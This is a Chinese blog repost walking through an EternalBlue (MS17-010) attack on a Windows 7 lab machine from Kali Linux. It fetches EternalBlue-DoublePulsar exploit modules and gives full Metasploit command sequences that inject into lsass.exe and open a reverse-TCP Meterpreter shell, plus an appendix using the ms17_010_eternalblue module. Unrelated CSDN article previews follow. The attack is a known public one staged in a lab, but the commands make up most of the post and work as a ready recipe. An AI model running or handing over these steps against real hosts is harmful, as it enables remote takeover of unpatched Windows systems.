kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)_我是公务员的博客-程序员秘密

技术标签: kali linux安装wine32  

本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

=================================

若kali为64位

windows为32

需要安装wine32 ,但64位的kali下无法apt-get install wine32

在执行exploit时会出现 :

it looks like wine32 is missing, you should install it.

multiarch needs to be enabled first. as root, please

execute "dpkg --add-architecture i386 && apt-get update &&

apt-get install wine32"

按照上面的方法dpkg --add-architecture i386 && apt-get update &&

apt-get install wine32即可

=================================

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32

21fdecc8da3c14e3a66dbe7c7477b0fc.png

用wine32执行cmd.exe

wine cmd.exe

3c31fd8ef64286ce7931eec5f6c62b95.png

exit //退出

af25c1c6b68e19c9bfe05478156f83a4.png

git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd Eternalblue-Doublepulsar-Metasploit/

cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

7bfc956d17422c2d1c7ffe482ce90361.png

6327a80656fea4d5388faf61f3c7506a.png

启动msf,然后进行一系列设置:

service postgresql start

msfconsole

776e79a05e71524a5af20851666060c7.png

search eternalblue

use exploit/windows/smb/eternalblue_doublepulsar

5abba64ece8bddadb9654fb23c3eb2ba.png

57bb05a793ea794c70af7c661c957ebe.png

set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT lsass.exe

set TARGETARCHITECTURE x64

set rhost 192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit

57bb05a793ea794c70af7c661c957ebe.png

29d7f9c189edc30092d07df14c45b640.png

b7c87844fa8d065b4f65a21b7efa004e.png

ddd0aff8bef50b3f3d3fba4a3390d0b5.png

8c447e9e5a44caa4bd434a5985ac2893.png

附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

57bb05a793ea794c70af7c661c957ebe.png

[email protected]:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

[email protected]:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo

57bb05a793ea794c70af7c661c957ebe.png

78bd61fdb9623e55df5d1978b849c36e.png

转载:https://www.cnblogs.com/backlion/p/6804863.html

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35458961/article/details/116933855

智能推荐

【web必知必会】—— 图解HTTP(转)good_weixin_34029680的博客-程序员秘密

本篇总结关于http的相关知识,主要内容参考如下导图:  主要讲解的内容有:  1 URL与URI的区别。  2 请求报文与相应报文的内容。  3 GET与POST的区别。  4 http的cookie、持久化、管道化、多部分对象集合、范围请求等  后续会更新http其他的相关知识。  关键词概念  平时会经常接触到URL,他就是我...

php商城常用前端框架,商城前端-d2admin_巴老板的博客-程序员秘密

CareyShop 商城后台管理系统CareyShop(简称 CS)是一套基于 ThinkPHP5 框架开发的高性能商城框架系统,秉承简洁、快速、极致的开发理念,框架内使用面向对象模块化调用,在多终端、跨平台时采用 REST API 架构来进行数据交互,可直接对接 PC、移动设备、小程序、云部署,构建 Android、IOS 的 APP。设计理念放眼移动热潮、新零售概念、各类终端的增多,服务端会与...

python常用正则表达式大全_python 利用正则表达式提取特殊信息_Kenv的博客-程序员秘密

1、删除字符串中的 Python注释案例:import retime = "2020-01-01 # 这是一个日期"num = re.sub(r'#.*$', "", time)#以#为分隔,去掉后面的信息print("这个时间是:", num)结果:这个时间是: 2020-01-012、截取某符号前后的内容案例1:txt = '我的电话是:131-246-XXX19'a = txt.split(...

做一个带时分秒的extjs 日期控件扩展_weixin_34417200的博客-程序员秘密

本地下载原文链接虽说不喜欢做这种做XX内部管理系统的生活,虽说不喜欢extjs,但是工作就是工作,找些乐趣也好。也感谢恶魔主管给我时间去了解,去修改一些很细节的体验方面的东西。唉,算了他又不看,不拍马屁了···extjs没有日期加时分秒的时间控件,然而我们用到了,所以需要自己去找。我们用了extjs5,但是大部分的这种控件都是停留在extjs4的,4和5相差很多,都不是很...

毕业设计 单片机Stm32环境监测系统_基于stm32单片机传感器应用的测试系统_Mdc_stdio的博客-程序员秘密

这两年开始毕业设计和毕业答辩的要求和难度不断提升,传统的毕设题目缺少创新和亮点,往往达不到毕业答辩的要求,这两年不断有学弟学妹告诉学长自己做的项目系统达不到老师的要求。为了大家能够顺利以及最少的精力通过毕设,学长分享优质毕业设计项目,今天要分享的是毕业设计 单片机Stm32环境监测系统学长这里给一个题目综合评分(每项满分5分)难度系数:4分工作量:4分创新点:3分。

Spring Boot JMS与IBM WebSphere MQ集成配置_意大利番茄的博客-程序员秘密

IBM WebSphere MQ 与 Spring Boot JMS 集成,通过JavaConfig进行配置以及事务管理

随便推点

【应急类漏洞】————1、未授权访问漏洞总结_hue漏洞_FLy_鹏程万里的博客-程序员秘密

前言2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植入、勒索,尤其是 Redis、MongoDB 等数据库的未授权访问漏洞尤其严重。参见《【脉搏译文系列】如何高效的应对勒索软件》0x01 介绍未授权访问可以理解为需要安全配置或权限认证的地址、...

Mongodb在Linux上安装教程_liblzma.so.0_冬山兄的博客-程序员秘密

现已入秋,吟诗一首,献给季节~~花间一壶酒,独酌无相亲。举杯邀明月,对影成三人。月既不解饮,影徒随我身。暂伴月将影,行乐须及春。我歌月徘徊,我舞影零乱。醒时相交欢,醉后各分散。永结无情游,相期邈云汉。正文开始:系统环境:linux centos7mongodb版本:4.4.0一、下载为了保证各处版本一致性及便捷性,使用官网下载安装包安装官网传送门:MongoDB Community Download | MongoDB说明:若...

shell基础,命令历史,命令补全,别名alias,通配符,输入输出重定向_alias中使用通配符_langyue919的博客-程序员秘密

shell基础shell 是一个命令解释器,提供用户和机器之间的交互,支持特定语法,比如逻辑判断,循环等。每个用户都可以有自己特性的shell,centos7默认shell为bash(bourne agin shell),还有zsh,ksh等,每种shell支持的特性不尽相同。命令历史history命令 ...

springboot中Thymeleaf和Freemarker模板引擎的区别_微笑点燃希望的博客-程序员秘密

前言这两个都是属于模板引擎,但是各有各的好处,enn,在市面上比较多的也就是jsp、freemarker、velocity、thymeleaf等页面方案。Thymeleaf和Freemarker的区别FreeMarker是一个用Java语言编写的模板引擎,它基于模板来生成文本输出。FreeMarker与Web容器无关,即在Web运行时,它并不知道Servlet或HTTP。它不仅可以用作...

afx_msg解释_bytxl的博客-程序员秘密

在afxwin.h中找到一些afx_msg的解释:    #ifndef   afx_msg    #define   afx_msg                   //   intentional   placeholder    #endif      没什么意思.只是定义了这个符号而已.   这个对编译器来说,相当于什么都没有,对于人来说,我们可以看到这样的符号.

Codeforces - Nastya and King-Shamans_青烟绕指柔!的博客-程序员秘密

题目链接:Codeforces - Nastya and King-Shamans显然,每次 * 2倍增最多进行log次,所以我们在线段树上二分,找到第一个 2 * a[i] 的位置即可。然后线段树维护前缀和的maxAC代码:#pragma GCC optimize("-Ofast","-funroll-all-loops")#include<bits/stdc++.h>#define int long longusing namespace std;const int N=

推荐文章

热门文章

相关标签